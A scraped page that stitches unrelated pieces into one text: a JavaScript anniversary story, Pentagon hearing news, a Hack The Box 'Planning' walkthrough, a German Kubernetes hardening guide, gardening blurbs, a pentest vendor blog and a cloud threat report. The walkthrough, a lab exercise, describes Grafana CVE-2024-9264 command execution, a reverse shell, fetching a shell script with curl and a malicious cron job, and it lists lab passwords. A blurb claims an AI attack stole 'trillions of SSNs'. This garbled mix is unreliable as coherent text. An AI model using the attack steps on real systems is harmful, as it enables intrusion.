Thirty years ago today, Netscape Communications and Sun Microsystems issued a joint press release announcing JavaScript, an object scripting language designed for creating interactive web applications. The language emerged from a frantic 10-day sprint at pioneering browser company Netscape, where engineer Brendan Eich hacked together a working internal prototype during May 1995.
While the JavaScript language didn’t ship publicly until that September and didn’t reach a 1.0 release until March 1996, the descendants of Eich’s initial 10-day hack now run on approximately 98.9 percent of all websites with client-side code, making JavaScript the dominant programming language of the web. It’s wildly popular; beyond the browser, JavaScript powers server backends, mobile apps, desktop software, and even some embedded systems. According to several surveys, JavaScript consistently ranks among the most widely used programming languages in the world.
In crafting JavaScript, Netscape wanted a scripting language that could make webpages interactive, something lightweight that would appeal to web designers and non-professional programmers. Eich drew from several influences: The syntax looked like a trendy new programming language called Java to satisfy Netscape management, but its guts borrowed concepts from Scheme, a language Eich admired, and Self, which contributed JavaScript’s prototype-based object model.
Security headlines distract, but the threats keeping CISOs awake are fundamental gaps and software supply chain risks. Learn why basics and visibility matter most.
The White House’s nominee to lead the Pentagon’s Cost Assessment and Program Evaluation office, long criticized for overstepping its advisory role, told lawmakers he would work to restore the office’s credibility by refocusing it on its statutory mission as an independent advisory rather than a decision-maker.
“I have seen CAPE take on an advocacy role that I think is inappropriate for an independent analytic organization,” Michael Payne, who is currently serving as the acting director of CAPE, told the Senate Armed Services Committee Thursday.
CAPE has faced scrutiny over the years for operating beyond its statutory responsibilities — in 2023, the House Armed Services Committee even proposed eliminating the office altogether. While Congress ultimately decided against shutting down the office, the fiscal 2024 defense policy bill required the Defense Department to overhaul how it operates.
The annual legislation required the Pentagon to create an analysis working group, which would work with CAPE, the Joint Staff and DoD components to improve analytic standards across the force. The bill also required the department to stand up an analytical team, or the “program evaluation competitive analysis cell” — an independent team to review CAPE’s methodologies, assumptions and data.
In addition, the law mandated a pilot program on alternative analysis to test new approaches for evaluating defense programs.
So far, only one of those requirements has been met. “We have stood up the analysis working group, but we absolutely need to do more. Red teaming is an important part of any scientific or analytic endeavor, and if I’m confirmed, I will make it a priority to ensure that we comply fully,” Payne said.
Sen. Roger Wicker (R-Miss.), who leads the Senate Armed Services Committee, voiced frustration during the confirmation hearing that little progress has been made, even though Payne has been in a leadership role at CAPE since the bill was signed into law.
“You’ve been deputy director since the law passed, and since January, you’ve been acting director. And yet, the second and third directives of the statute passed by the Congress and signed into law by the commander-in-chief have not been implemented — that is a concern,” Wicker said.
In his written responses to lawmakers’ questions ahead of his confirmation hearing, Payne said steering the office back to its roots and away from advocacy would be his biggest challenge. The effort, he said, would require reforming the office’s cost-estimating and program-evaluation processes to better align with department-wide ongoing acquisition reform initiatives.
“I would address the program-evaluation process by reforming the analysis of alternatives approach to better align with the reformed requirements and acquisition processes, including early engagement with industry. For cost estimating, I would focus on ensuring cost reporting requirements for industry are less burdensome in order to better facilitate the entry of non-traditional vendors into the acquisition process,” Payne said.
When asked if he believes that the CAPE office would benefit from outside reviews of its processes, Payne said he recommends “using existing government entities to conduct such reviews, that the reviews be targeted with specific objectives, and that DCAPE be given an opportunity to address the findings directly in order to implement improvements.”
‘Strained’ workforce
Payne said while the team is still capable of meeting existing legal requirements by pushing some of its cost-estimation work to the military services, CAPE’s workforce is stretched thin.
“The recent addition of statutory requirements for military construction and sustainment review cost estimating has necessitated increased delegation to the services,” Payne said.
“I believe the workforce is sufficient, though strained in certain areas as it adapts to broader national workforce demographic and skill shifts,” he added.
Chairman Roger Wicker, R-Miss., speaks to Stephen Feinberg, President Donald Trump's choice to be deputy secretary of defense, as he appears before the Senate Armed Services Committee for his confirmation hearing, on Capitol Hill in Washington, Tuesday, Feb. 25, 2025. (AP Photo/Ben Curtis)
Operant AI reveals Shadow Escape, a zero-click attack using the MCP flaw in ChatGPT, Gemini, and Claude to secretly steal trillions of SSNs and financial data. Traditional security is blind to this new AI threat.
In this write-up, we will explore the “Planning” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Planning” machine from Hack The Box by achieving the following objectives:
User Flag:
During reconnaissance, extensive fuzzing was required to identify a Grafana instance vulnerable to CVE-2024-9264—a critical flaw enabling arbitrary command execution through unsanitized SQL inputs in the DuckDB CLI. By deploying a proof-of-concept exploit, I successfully extracted files and ran commands, gaining entry to the Grafana container but not the underlying host. Subsequent enumeration uncovered valid credentials for the user “enzo,” which granted SSH access to the host system.
Root Flag:
Once on the host, I discovered the Crontab-UI service—a web-based tool for managing cron jobs—running on localhost:8000 and secured with Basic Authentication. Leveraging the earlier credentials for the “enzo” user, I authenticated to the interface and added a malicious cron job configured to establish a reverse shell connection.
Enumerating the Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
Port 22 (SSH): Secure Shell service for remote access.
Port 80 (HTTP): Web server running Apache.
Web Application Exploration:
The website for Edukate appears to be a standard educational platform.
What is Edukate?
Edukate is a free educational website template designed for online learning platforms and academic institutions. Its intuitive layout improves user engagement, while its clean, developer-friendly codebase makes customization simple. Built with Sass for easy maintenance, Edukate is optimized for page speed to deliver fast loading times and lower bounce rates. It is fully cross-browser compatible, ensuring a smooth experience across all major browsers, and SEO-friendly to help boost search engine rankings.
Gobuster found a valid virtual host: grafana.planning.htb.
This is likely an internal service meant for the organization’s team, not a public endpoint.
Since it contains grafana, it strongly suggests it is a Grafana dashboard instance.
Grafana Application
The grafana.planning.htb subdomain loads successfully and displays the Grafana login page.
We should be able to log in using the credentials provided by Hack The Box.
Username: admin
Password: 0D5oT70Fq13EvB5r
We need to inspect the traffic using Burp Suite.
First, I noticed that the endpoint /api/user/auth-tokens-rotate is available here.
We successfully gained access to the Grafana dashboard.
We also confirmed that the Grafana instance is running version 11.0.0
There are numerous tokens being rotated here.
This is what the response looks like in Burp Suite.
Critical SQL Expression Vulnerability in Grafana Enabling Authenticated LFI/RCE
This vulnerability targets Grafana 11’s experimental SQL Expressions feature, which allows users to post-process query results via custom SQL using DuckDB. The flaw arises because user input isn’t properly sanitized before being sent to the DuckDB CLI, enabling remote code execution (RCE) or arbitrary file reads. The root cause is unfiltered input passed directly to the DuckDB command-line interface. The CVSS v3.1 score is 9.9 (Critical).
Grafana doesn’t include DuckDB by default. For exploitation, DuckDB must be installed on the server and accessible in Grafana’s PATH. If it’s absent, the system is safe.
Using a PoC, we can exploit this flaw to read system files, demonstrating its impact and severity.
Let’s search Google for potential exploits targeting Grafana v11.0.0
This flaw enables authenticated users to attain remote code execution (RCE). I exploited it using the publicly available proof-of-concept from Nollium’s GitHub repository.
We successfully retrieved the /etc/passwd file.
When we ran the whoami command, it returned root, which is unexpected.
Let’s set up our listener.
Unfortunately, we were unable to execute the command due to an error.
As suspected, this is running inside a Docker container.
The environment variables reveal the Grafana admin credentials:
GF_SECURITY_ADMIN_USER=enzo
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!.
Exploit CVE-2024-9264 using Burp Suite.
The api/ds/query endpoint is available in Grafana, and we can leverage it for this exploit.
If the full path is not specified, it responds with a “Not Found” message.
However, attempting to execute the full path results in an “Unauthorized” response.
It’s still the same; we need to send the JSON data here.
This JSON payload is a crafted query sent to Grafana’s api/ds/query endpoint. It uses the Expression data source with an SQL expression to run a sequence of commands: first installing and loading the shellfs extension, then executing whoami and redirecting the output to /tmp/output.txt. This effectively demonstrates command execution through CVE-2024-9264.
Reading the contents of /tmp/output.txt confirms that the whoami command executed on the target machine.
Let’s set up our listener to catch the reverse shell.
Use this SQL command to execute the bash script.
It’s hanging, which is a good sign that the payload is executing.
We successfully received a reverse shell connection.
We attempted to switch to the enzo user with su enzo, but it didn’t work.
SSH worked perfectly and allowed us to log in successfully.
We were able to read the user flag by running cat user.txt.
Escalate To Root Privileges Access
Privilege Escalation:
Locate the database file.
We discovered /opt/crrontabs/crontab.db.
The password for root_grafana is P4ssw0rdS0pRi0T3c.
Port 8000 is open here, which is unusual.
Let’s set up port forwarding for port 8000.
We need to provide the credentials to log in.
We need to use the credentials we discovered earlier to log in.
It turned out to be a cron jobs management interface.
What is Cronjob-UI?
Crontab-UI is an open-source Node.js web interface for managing cron jobs on Unix-like systems, simplifying tasks like creating, editing, pausing, deleting, and backing up crontab entries via a browser (default: http://localhost:8000). It reduces errors from manual text editing, supports error logging, email notifications, webhooks, and easy import/export for multi-machine deployment. Installation is via npm (npm install crontab-ui -g), with optional Docker support and Basic Auth for security. Ideal for beginners handling scheduled tasks.
We need to create a new cron job command.
The shell.sh file contains the reverse shell that will connect back to us.
We will use curl to fetch the file, as demonstrated earlier.
The file was transferred successfully, as expected.
We were able to access the root shell and read the root flag by running cat root.txt.
Continuous Vulnerability Management: The New Cybersecurity Imperative Security leaders are drowning in data but starving for actionable insights. Traditional penetration testing has become a snapshot of vulnerability that expires faster...
The AI Threat Landscape: How Adaptive Security is Redefining Cyber Defense Cybersecurity professionals are facing an unprecedented challenge. The rise of generative AI has transformed attack vectors from theoretical risks...
Die IT-Welt verändert sich rasant, und Container und Kubernetes (K8s) erfreuen sich immer größerer Beliebtheit. Der Wechsel von virtuellen Maschinen zu Containern und später zu Container-Koordinierungsplattformen (die erste Version von Docker wurde 2013 veröffentlicht) vollzog sich innerhalb von nur sieben Jahren. Während einige Startups noch Erfahrungen damit sammeln, wie sie von diesen neuen Ressourcen profitieren können, suchen einige etablierte Unternehmen nach Möglichkeiten, ihre veralteten Systeme zu effizienteren Infrastrukturen zu migrieren.
Die schnelle Einführung von Containern und Kubernetes zeigt die disruptive Wirkung dieser Technologien. Sie haben jedoch auch zu neuen Sicherheitsproblemen geführt. Da Container und Kubernetes so beliebt sind und von vielen Unternehmen ohne angemessene Sicherheitsmaßnahmen eingesetzt werden, sind sie perfekte Ziele für Angreifer.
Ein K8s-Cluster besteht aus mehreren Maschinen, die in einem Master-Node (und seinen Kopien) verwaltet werden. Dieser Cluster kann aus tausenden Maschinen und Services bestehen und ist daher ein hervorragender Angriffsvektor. Daher ist es wichtig, strikte Sicherheitspraktiken zu implementieren.
Absicherung Ihres Clusters
Der Kubernetes-Cluster enthält zahlreiche dynamische Elemente, die angemessen geschützt werden müssen. Die Absicherung des Clusters ist jedoch keine einmalige Angelegenheit, sondern erfordert Best Practices und ein kompetentes Sicherheitsteam.
Wir erläutern verschiedene Kubernetes-Angriffsvektoren sowie Best Practices zum Schutz Ihres K8s-Clusters.
Gewährleisten, dass Kubernetes und die Nodes auf dem neuesten Stand sind
K8s ist ein Open-Source-System, das kontinuierlich aktualisiert wird. Das GitHub-Repository gehört zu den aktivsten Repositorys der Plattform. Kontinuierlich werden neue Funktionen, Verbesserungen und Sicherheits-Updates hinzugefügt.
Alle vier Monate wird eine neue Hauptversion von Kubernetes mit neuen Funktionen zur Verbesserung des Services veröffentlicht. Gleichzeitig kommen wie bei jeder Software – und ganz besonders bei häufig aktualisierten Programmen – neue Sicherheitsprobleme und Fehler hinzu.
Doch auch in älteren Versionen werden Sicherheitsverletzungen gefunden. Es ist daher wichtig zu verstehen, wie das Kubernetes-Team in diesen Fällen mit Sicherheitsupdates umgeht. Im Gegensatz zu Linux-Distributionen und anderen Plattformen verfügt Kubernetes nicht über eine LTS-Version. Stattdessen versucht Kubernetes ein Backporting von Sicherheitsproblemen für die drei zuletzt veröffentlichten Hauptversionen.
Daher ist es wichtig, dass Ihr Cluster eine der drei zuletzt veröffentlichten Hauptversionen verwendet und Sicherheitspatches zügig implementiert werden. Außerdem sollten Sie die Aktualisierung auf die neueste Hauptversion zumindest einmal innerhalb von zwölf Monaten durchführen.
Zusätzlich zu den Hauptkomponenten verwendet Kubernetes auch Nodes, auf denen die Workloads ausgeführt werden, die dem Cluster zugewiesen sind. Bei diesen Nodes kann es sich um physische oder virtuelle Maschinen handeln, auf denen ein Betriebssystem ausgeführt wird. Dabei ist jeder Node ein potenzieller Angriffsvektor, der zur Vermeidung von Sicherheitsproblemen aktualisiert werden muss. Zur Verringerung der Angriffsfläche müssen die Nodes daher so sauber wie möglich sein.
Einschränkung der Zugriffsrechte
Rollenbasierte Zugangskontrolle (Role-based Access Control, RBAC) ist einer der besten Ansätze, um zu kontrollieren, welche Benutzer wie auf den Cluster zugreifen können. Er bietet die Möglichkeit, die Zugriffsrechte für jeden einzelnen Benutzer detailliert festzulegen. Die Regeln gelten jeweils additiv, sodass jede Berechtigung explizit gewährt werden muss. Mithilfe von RBAC können Sie die Zugriffsrechte (Anzeigen, Lesen oder Schreiben) für jedes Kubernetes-Objekt – von Pods (der kleinsten K8s-Recheneinheit) bis zu Namespaces – beschränken.
RBAC kann auch per OpenID Connect-Token auf einen weiteren Verzeichnisdienst angewendet werden, sodass die Benutzer- und Gruppenverwaltung zentral erfolgen und im Unternehmen auf breiterer Ebene umgesetzt werden kann.
Die Zugriffsrechte sind nicht nur auf Kubernetes beschränkt. Wenn Benutzer zum Beispiel Zugriff auf einen Cluster-Node benötigen, um Probleme identifizieren zu können, ist es sinnvoll, temporäre Benutzer zu erstellen und nach der Behebung der Probleme wieder zu löschen.
Best Practices für Container
Docker, die am häufigsten eingesetzte Container-Technologie, besteht aus Layern: Das innerste Layer ist die einfachste Struktur und das äußere Layer ist die spezifischste. Daher beginnen alle Docker-Images mit einer Form von Distributions- oder Sprach-Support, wobei jedes neue Layer eine Funktion hinzufügt oder die vorherige Funktion modifiziert. Der Container enthält alles, was zum Hochfahren der Anwendung erforderlich ist.
Diese Layer (auch als Images bezeichnet) können öffentlich im Docker Hub oder privat in einer anderen Image-Registry verfügbar sein. Das Image kann zum Zeitpunkt der Image-Erstellung in zwei Formen ausgedrückt werden: als Name plus Bezeichnung (z. B. Node:aktuell) oder mit einer unveränderlichen SHA-ID (z. B. sha256:d64072a554283e64e1bfeb1bb457b7b293b6cd5bb61504afaa3bdd5da2a7bc4b).
Das Image, das der Bezeichnung zugeordnet ist, kann vom Repository-Inhaber jederzeit geändert werden, d. h. das Tag aktuell weist darauf hin, dass es sich um die neueste verfügbare Version handelt. Das heißt aber auch, dass sich das innere Layer bei der Erstellung eines neuen Images oder beim Ausführen eines Images mit diesem Tag plötzlich und ohne Benachrichtigung ändern kann.
Diese Vorgehensweise verursacht einige Probleme: (1) Sie verlieren die Kontrolle darüber, was in Ihrer Kubernetes-Instanz ausgeführt wird, wenn ein äußeres Layer aktualisiert wird und einen Konflikt verursacht, oder (2) das Image wird absichtlich modifiziert, um eine Sicherheitsschwachstelle hinzuzufügen.
Um das erste Problem zu umgehen, vermeiden Sie das Tag aktuell und wählen ein konkretes Tag, das die Version beschreibt (z. B. Node:14.5.0). Und um das zweite Problem zu vermeiden, wählen Sie offizielle Images und klonen Sie das Image in Ihr privates Repository oder verwenden Sie den SHA-Wert.
Ein weiterer Ansatz besteht darin, ein Tool zur Schwachstellenerkennung einzusetzen und die Images kontinuierlich zu prüfen. Diese Tools können mit kontinuierlichen Integrations-Pipelines parallel ausgeführt werden und das Image-Repository überwachen, um zuvor unerkannte Probleme zu identifizieren.
Bei der Erstellung eines neuen Images müssen Sie beachten, dass jedes Image immer nur einen Dienst enthalten sollte. Außerdem sollte die Zahl der Abhängigkeiten auf ein Minimum beschränkt werden, um die Angriffsfläche auf die Komponenten zu reduzieren, die für den Dienst unerlässlich sind. Wenn jedes Image nur eine Anwendung enthält, lässt es sich zudem leichter für neuere Versionen aktualisieren. Es wird auch einfacher, Ressourcen zuzuweisen.
Netzwerksicherheit
Im vorherigen Abschnitt ging es um die Reduzierung der Angriffsfläche. Das gilt auch für die Netzwerkfunktionen. Kubernetes enthält virtuelle Netzwerke innerhalb des Clusters, die den Zugriff zwischen Pods beschränken und externe Zugriffe erlauben können, sodass nur der Zugriff auf genehmigte Dienste möglich ist. Das ist eine primitive Lösung, die nur in kleinen Clustern funktioniert.
Größere Cluster, die mehrere, von verschiedenen Teams entwickelte Dienste enthalten, sind jedoch deutlich komplexer. In diesen Fällen ist ein zentraler Ansatz eventuell nicht umsetzbar, stattdessen gelten Service Meshes als bestmögliche Methode. Das Service Mesh erstellt eine Netzwerkverschlüsselungsebene, über die Dienste sicher miteinander kommunizieren können. Sie fungieren meist als Sidecar-Agent, d. h. sie werden wie ein Beiwagen an jeden Pod angefügt und ermöglichen die Kommunikation zwischen den Diensten. Service-Meshes übernehmen nicht nur Sicherheitsfunktionen, sondern ermöglichen zudem Erkennung, Überwachung/Nachverfolgung/Protokollierung und vermeiden Dienstunterbrechungen, indem sie zum Beispiel ein als Circuit Breaking (Sicherung) bezeichnetes Entwurfsmuster verwenden.
Festlegen von Ressourcenkontingenten
Da Anwendungen quasi permanent aktualisiert werden, genügt es nicht, für die Absicherung Ihres Clusters einfach die oben beschriebenen Methoden zu implementieren. Das Risiko einer Sicherheitsverletzung bleibt weiterhin bestehen.
Ein weiterer wichtiger Schritt ist die Verwendung von Ressourcenkontingenten, bei denen Kubernetes die Ausfallabdeckung auf die festgelegten Grenzen beschränkt. Wenn diese Grenzen gut definiert sind, wird verhindert, dass im Falle einer Ressourcenerschöpfung alle Cluster-Dienste ausfallen.
Außerdem wird verhindert, dass zum Ende des Monats massive Kosten für die Cloud-Bereitstellung anfallen.
Überwachung und Protokollierung
Die Überwachung des Clusters (vom Cluster bis zu den Pods) ist für die Erkennung von Ausfällen und Identifizierung von Ursachen unerlässlich. Dabei geht es vor allem um die Erkennung von ungewöhnlichen Verhaltensweisen. Wenn der Netzwerkverkehr zugenommen hat oder sich die CPU der Nodes anders verhält, sind weitere Untersuchungen zur Problemsuche erforderlich. Während es bei der Überwachung mehr um Kennzahlen wie CPU, Arbeitsspeicher und Netzwerkleistung geht, kann die Protokollierung zusätzliche (historische) Informationen liefern, mit denen sich ungewöhnliche Muster oder die Quelle des Problems schnell identifizieren lassen.
Die Tools Prometheus und Graphana sind in Kombination für die effektive Überwachung von Kubernetes geeignet. Prometheus ist eine hochleistungsfähige Zeitreihen-Datenbank, während Graphana die Daten aus Prometheus lesen und in übersichtlichen grafischen Dashboards darstellen kann.
ElasticSearch ist ein weiteres nützliches Tool und gehört zu den beliebtesten Tools für die zentrale Protokollierung von Anwendungen, Nodes und Kubernetes selbst fast in Echtzeit.
Cloud oder lokal – die Sicherheitsaspekte
Eine Kubernetes-Installation kann lokal oder über einen Cloud-Management-Dienst erfolgen. Bei einer lokalen Bereitstellung muss jede Konfiguration (Hochfahren neuer Maschinen, Einrichtung des Netzwerks und Absicherung der Anwendung) manuell durchgeführt werden. Bei Cloud-basierten Diensten wie Google GKE, AWS EKS oder Azure AKS kann K8s mit minimalem Konfigurationsaufwand installiert werden. Sie sind dann automatisch mit anderen Diensten dieses Dienstanbieters kompatibel.
In Bezug auf die Sicherheit benötigen lokale Lösungen erheblich mehr Aufmerksamkeit. Wie bereits erwähnt, muss jedes neue Update heruntergeladen und vom System konfiguriert werden, und die Nodes müssen ebenfalls aktualisiert werden. Es wird daher empfohlen, dass lokale Kubernetes-Umgebungen nur von einem erfahrenen Team bereitgestellt werden.
Bei Diensten, die über die Cloud verwaltet werden, ist der Prozess hingegen deutlich einfacher: Kubernetes ist bereits installiert und der Cloud-Anbieter sorgt dafür, dass alle Nodes auf dem aktuellen Stand sind und über die neuesten Sicherheitsfunktionen verfügen. In Bezug auf die Cluster bieten die meisten Cloud-Anbieter Benutzern die Option, eine von mehreren K8s-Versionen zu wählen. Außerdem stellen sie Möglichkeiten zur Aktualisierung auf eine neue Version zur Verfügung. Somit ist diese Vorgehensweise einfacher, aber weniger flexibel.
Abschließende Anmerkungen
In Anbetracht ständiger Updates und der Flut an Tools, die auf den Markt gelangen, bedeuten Aktualisierungen und das Schließen von Sicherheitslücken einen erheblichen Aufwand. Dadurch sind Breaches praktisch unvermeidbar. Bei Kubernetes ist die Herausforderung noch größer, da es sich nicht nur um ein Tool handelt. Vielmehr besteht Kubernetes aus mehreren Tools, die wiederum weitere Tools, Maschinen und Netzwerke verwalten. Die Sicherheit spielt daher eine zentrale Rolle.
Angesichts dieser dynamischen Umgebung ist die Absicherung von Kubernetes alles andere als einfach. Berücksichtigen Sie daher diese Tipps:
Überprüfen Sie Anwendungen, die auf K8s laufen, auf Sicherheitsprobleme.
Beschränken und kontrollieren Sie den Zugriff.
Stellen Sie sicher, dass alle Komponenten die neuesten Sicherheitsupdates enthalten, und überwachen Sie den Cluster kontinuierlich, um Ausfälle sofort beheben und so Schaden zu vermeiden.
Die Herausforderung ist bei lokalen Bereitstellungen noch größer, da hier echte Hardware verwaltet, Automatisierungen eingerichtet und mehr Software-Programme aktualisiert werden müssen. Wenn Sie die hier beschriebenen Best Practices befolgen, profitieren Sie von einem großen Sicherheitsvorteil und können den sicheren und zuverlässigen Betrieb Ihrer Kubernetes-Umgebung gewährleisten.
Die SentinelOne-Plattform unterstützt physische und virtuelle Maschinen, Docker, selbstverwaltete Kubernetes-Instanzen und über Cloud-Dienstanbieter verwaltete Kubernetes-Implementierungen wie AWS EKS. Wenn Sie mehr erfahren möchten, fordern Sie noch heute eine kostenlose Demo an.
As winter approaches, it’s tempting just to sit back and put your feet up and not have to think about the garden until springtime. However, just a bit of extra work at this time of the year can save you a whole lot of hassle come planting time. Garden clean-up, the last big chore for gardeners, is often overlooked, especially […]
Winter Ornamentals – Bark Book Excerpt by Dan Hinkley Like the last and messy hours of a party gone on too long, the soggy, cool days of late autumn cast about the garden a mood of the season’s demise. Yet as the last colored leaves, varnished with the first rains of winter, fall earthward, the deciduous trees bare their sinewy […]
Penetration Testing and Formula One Racing – Preparation is Key
By Nathan JonesDirector, Customer Success, Synack
In Formula One, the most prepared teams have the best chances of success. Yet, preparation alone isn’t going to clinch a victory. Many factors contribute to crossing the finish line first: track conditions, weather, car setup, strategy changes and updates, as well as driver skill and decision making.
At Synack, we’ve got you covered throughout the entire engagement on our Crowdsourced Penetration Testing Platform before and after our trusted network of security researchers go to work hunting for your vulnerabilities.
Here’s what to expect throughout the Synack engagement:
It starts with high-quality, trusted researchers
Your pit team: Researchers’ skills are critically important to the success of any pentest. Because the vulnerability landscape is so broad and diverse, a single researcher — or even a small number of researchers — won’t have expertise across all vulnerability categories to fully test the assets in question.
That’s the value of the Synack crowdsourced testing platform because we attract the best researchers with a wide variety of skills and backgrounds. This allows large numbers of researchers to bring their experience to bear across the range of vulnerability categories, enabling the most thorough test of the assets in scope.
Results get collected in a well-designed platform
Right car, right tools: A top-quality vulnerability management platform should underpin any pentest initiative, allowing customers to manage the full vulnerability lifecycle from initial reports, to analyst review, and then onto remediation. At Synack, the customer portal lets your team view vulnerabilities flow through a logical, easy-to-use workflow from discovery to patch to patch verification.
In addition, our triage process ensures that vulnerability findings passed to the customer are valid, reproducible, high quality and actionable. This allows the customer to focus efforts on understanding the issues and taking appropriate action, saving considerable time and effort.
Control the testing environment and parameters
Know the course: Some penetration tests can be intrusive and noisy. The Synack experience has been designed to make the process as simple and seamless as possible. It is carried out in a controlled manner to mitigate any sort of impact to client’s everyday business operations. Researchers work from a known source IP to ensure proper monitoring. Customers are encouraged to monitor activity and traffic during the test but we recommend waiting for a formal vulnerability report before any patching. Patching during a test limits researchers’ ability to validate the finding and reward the researcher.
Engage with researchers before and after the test
Connected to the pit crew: A testing engagement should not be a fire-and-forget activity. Customers should be looking to provide regular feedback, including information about new releases or changes, areas of scope on which researchers should focus and updates on any customer actions.
Scope changes are a critical area of communication. A class of vulnerabilities caused by the same underlying issue should be temporarily removed from scope to prevent inundating the client with repetitive findings. We do this at Synack because it reduces noise as well as shifts the focus of researchers to other areas, thus ensuring better coverage.
Augment manual testing with smart automation
Change out the equipment when needed: Penetration testing harnesses human creativity to create value, but automated scanners are an important tool, as well, to help augment human efforts. Too often, however, security teams have had to accept trade offs, investing in cheap self-service scanning solutions to get broad attack surface coverage. There’s a better way. Smarter technologies built on machine learning principles can make a difference and help scale the testing effort. At Synack, SmartScan®, our vulnerability assessment solution, enables, rather than burdens, security teams by scaling security testing and accelerating their vulnerability remediation processes. SmartScan® combines industry-best scanning technology, proprietary risk identification technology, and a crowd of the world’s best security researchers, the Synack Red Team (SRT) for noiseless scanning and high-quality triage.
Recognize the possibility of unintended consequences
Expect the unexpected: Every pentester and testing company seeks to avoid unwanted impact to the customer. Most issues can be avoided by having an accurate scope and researcher guidelines agreed ahead of testing. On the rare occasion that there is an incident, we have a process in place to deal with it immediately.
Act on the results
Celebrate your wins, learn from your mistakes: It’s essential that clients act on findings. Just discovering vulnerabilities does not improve an organization’s risk posture. The vulnerabilities should be patched and remediated as soon as possible. Clients should look to monitor and track their risk posture over time using a risk metric such as Synack’s Attacker Resistance Score to chart improvements.
For long-term testing engagements, clients should not wait until the pentest has completed, but should fix issues and receive confirmation from the pentester that the mitigation was successful throughout the test.
Verifying compliance with necessary regulations is also a key part of using the results of a penetration test. Synack strongly recommends that clients opt for a testing package that includes checking compliance, including either relevant OWASP categories, PCI DSS 11.3, and NIST SP 800-53. A testing checklist provides auditable documentation for compliance-driven penetration testing requirements.
Keep on testing
Always winning: In Formula One, when the race ends, the work isn’t’ over. There are always more races to run and further developments and improvements to make to stay ahead of the pack.
The same is true in pentesting. As adversaries get more advanced, staying one step ahead in their cybersecurity is more important than ever. Regular pentesting is a key component of this. A client is only as strong as their weakest link, making appropriate pentesting against their entire attack surface critical to remaining cyber secure.
Winning looks like an overall reduction in vulnerability risk. While it’s impossible to eliminate all vulnerabilities, a healthy pentesting cadence will strengthen your security posture over time.
Nathan Jones is Director of Client Operations at Synack. He’s also a huge racing fan.
While cloud computing and its many forms (private, public, hybrid cloud or multi-cloud environments) have become ubiquitous with innovation and growth over the past decade, cybercriminals have closely watched the migration and introduced innovations of their own to exploit the platforms. Most of these exploits are based on poor configurations and human error. New IBM Security X-Force data reveals that many cloud-adopting businesses are falling behind on basic security best practices, introducing more risk to their organizations.
Shedding light on the “cracked doors” that cybercriminals are using to compromise cloud environments, the 2022 X-Force Cloud Threat Landscape Report uncovers that vulnerability exploitation, a tried-and-true infection method, remains the most common way to achieve cloud compromise. Gathering insights from X-Force Threat Intelligence data, hundreds of X-Force Red penetration tests, X-Force Incident Response (IR) engagements and data provided by report contributor Intezer, between July 2021 and June 2022, some of the key highlights stemming from the report include:
Cloud Vulnerabilities are on the Rise — Amid a sixfold increase in new cloud vulnerabilities over the past six years, 26% of cloud compromises that X-Force responded to were caused by attackers exploiting unpatched vulnerabilities, becoming the most common entry point observed.
More Access, More Problems — In 99% of pentesting engagements, X-Force Red was able to compromise client cloud environments through users’ excess privileges and permissions. This type of access could allow attackers to pivot and move laterally across a victim environment, increasing the level of impact in the event of an attack.
Cloud Account Sales Gain Grounds in Dark Web Marketplaces — X-Force observed a 200% increase in cloud accounts now being advertised on the dark web, with remote desktop protocol and compromised credentials being the most popular cloud account sales making rounds on illicit marketplaces.
As the rise of IoT devices drives more and more connections to cloud environments, the larger the potential attack surface becomes introducing critical challenges that many businesses are experiencing like proper vulnerability management. Case in point — the report found that more than a quarter of studied cloud incidents were caused due to known, unpatched vulnerabilities being exploited. While the Log4j vulnerability and a vulnerability in VMware Cloud Director were two of the more commonly leveraged vulnerabilities observed in X-Force engagements, most vulnerabilities observed that were exploited primarily affected the on-premises version of applications, sparing the cloud instances.
As suspected, cloud-related vulnerabilities are increasing at a steady rate, with X-Force observing a 28% rise in new cloud vulnerabilities over the last year alone. With over 3,200 cloud-related vulnerabilities disclosed in total to date, businesses face an uphill battle when it comes to keeping up with the need to update and patch an increasing volume of vulnerable software. In addition to the growing number of cloud-related vulnerabilities, their severity is also rising, made apparent by the uptick in vulnerabilities capable of providing attackers with access to more sensitive and critical data as well as opportunities to carry out more damaging attacks.
These ongoing challenges point to the need for businesses to pressure test their environments and not only identify weaknesses in their environment, like unpatched, exploitable vulnerabilities, but prioritize them based on their severity, to ensure the most efficient risk mitigation.
Excessive Cloud Privileges Aid in Bad Actors’ Lateral Movement
The report also shines a light on another worrisome trend across cloud environments — poor access controls, with 99% of pentesting engagements that X-Force Red conducted succeeding due to users’ excess privileges and permissions. Businesses are allowing users unnecessary levels of access to various applications across their networks, inadvertently creating a stepping stone for attackers to gain a deeper foothold into the victim’s cloud environment.
The trend underlines the need for businesses to shift to zero trust strategies, further mitigating the risk that overly trusting user behaviors introduce. Zero trust strategies enable businesses to put in place appropriate policies and controls to scrutinize connections to the network, whether an application or a user, and iteratively verify their legitimacy. In addition, as organizations evolve their business models to innovate at speed and adapt with ease, it’s essential that they’re properly securing their hybrid, multi-cloud environments. Central to this is modernizing their architectures: not all data requires the same level of control and oversight, so determining the right workloads, to put in the right place for the right reason is important. Not only can this help businesses effectively manage their data, but it enables them to place efficient security controls around it, supported by proper security technologies and resources.
Dark Web Marketplaces Lean Heavier into Cloud Account Sales
With the rise of the cloud comes the rise of cloud accounts being sold on the Dark Web, verified by X-Force observing a 200% rise in the last year alone. Specifically, X-Force identified over 100,000 cloud account ads across Dark Web marketplaces, with some account types being more popular than others. Seventy-six percent of cloud account sales identified were Remote Desktop Protocol (RDP) access accounts, a slight uptick from the year prior. Compromised cloud credentials were also up for sale, accounting for 19% of cloud accounts advertised in the marketplaces X-Force analyzed.
The going price for this type of access is significantly low making these accounts easily attainable to the average bidder. The price for RDP access and compromised credentials average $7.98 and $11.74 respectively. Compromised credentials’ 47% higher selling price is likely due to their ease of use, as well as the fact that postings advertising credentials often include multiple sets of login data, potentially from other services that were stolen along with the cloud credentials, yielding a higher ROI for cybercriminals.
As more compromised cloud accounts pop up across these illicit marketplaces for malicious actors to exploit, it’s important that organizations work toward enforcing more stringent password policies by urging users to regularly update their passwords, as well as implement multifactor authentication (MFA). Businesses should also be leveraging Identity and Access Management tools to reduce reliance on username and password combinations and combat threat actor credential theft.
To read our comprehensive findings and learn about detailed actions organizations can take to protect their cloud environments, review our 2022 X-Force Cloud Security Threat Landscape here.
